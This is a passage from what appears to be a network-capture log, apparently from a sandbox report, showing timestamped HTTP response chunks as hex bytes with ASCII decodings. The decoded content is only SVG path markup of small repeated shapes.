                                                                                                                                                                              2023-09-15 05:27:44 UTC3875INData Raw: 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 39 31 2c 33 30 32 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33
                                                                                                                                                                              Data Ascii: ,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M364.91,302.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3
                                                                                                                                                                              2023-09-15 05:27:44 UTC3891INData Raw: 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61
                                                                                                                                                                              Data Ascii: .93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><pa
                                                                                                                                                                              2023-09-15 05:27:44 UTC3907INData Raw: 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 35 2e 31 31 2c 32 34 39 2e 37 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                              Data Ascii: 0,0,1,.18,3.32"/><path class="cls-9" d="M325.11,249.73a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8
                                                                                                                                                                              2023-09-15 05:27:44 UTC3923INData Raw: 22 20 64 3d 22 4d 33 35 39 2e 35 37 2c 32 39 37 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                              Data Ascii: " d="M359.57,297.08a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3
                                                                                                                                                                              2023-09-15 05:27:44 UTC3939INData Raw: 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 37 37 2c 33 33 36 2e 33 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c
                                                                                                                                                                              Data Ascii: .6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M393.77,336.36a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,
                                                                                                                                                                              2023-09-15 05:27:44 UTC3955INData Raw: 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f
                                                                                                                                                                              Data Ascii: 2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/
                                                                                                                                                                              2023-09-15 05:27:44 UTC3971INData Raw: 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 35 37 2c 31 39 37 2e 30 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                              Data Ascii: .05,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M446.57,197.09a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-
                                                                                                                                                                              2023-09-15 05:27:44 UTC3987INData Raw: 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 37 36 2c 32 33 36 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c
                                                                                                                                                                              Data Ascii: .59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M480.76,236.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,
                                                                                                                                                                              2023-09-15 05:27:44 UTC4003INData Raw: 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                              Data Ascii: ,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls
                                                                                                                                                                              2023-09-15 05:27:44 UTC4019INData Raw: 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 34 32 2c 33 32 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                              Data Ascii: 0,1,.18,3.33"/><path class="cls-9" d="M549.42,323a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8
                                                                                                                                                                              2023-09-15 05:27:44 UTC4035INData Raw: 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20
                                                                                                                                                                              Data Ascii: 94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path
                                                                                                                                                                              2023-09-15 05:27:44 UTC4051INData Raw: 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                              Data Ascii: 9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,
                                                                                                                                                                              2023-09-15 05:27:44 UTC4067INData Raw: 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 36 31 2c 36 32 2e 37 39 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35
                                                                                                                                                                              Data Ascii: 1,.15,2.67"/><path class="cls-9" d="M360.61,62.79a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25
                                                                                                                                                                              2023-09-15 05:27:44 UTC4083INData Raw: 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 38 2e 30 35 2c 39 34 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d
                                                                                                                                                                              Data Ascii: .47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M388.05,94.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-
                                                                                                                                                                              2023-09-15 05:27:44 UTC4099INData Raw: 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 34 39 2c 31 32 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c
                                                                                                                                                                              Data Ascii: .88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M415.49,125.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,
                                                                                                                                                                              2023-09-15 05:27:44 UTC4115INData Raw: 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64
                                                                                                                                                                              Data Ascii: 0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d
                                                                                                                                                                              2023-09-15 05:27:44 UTC4131INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c
                                                                                                                                                                              Data Ascii: 3,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><
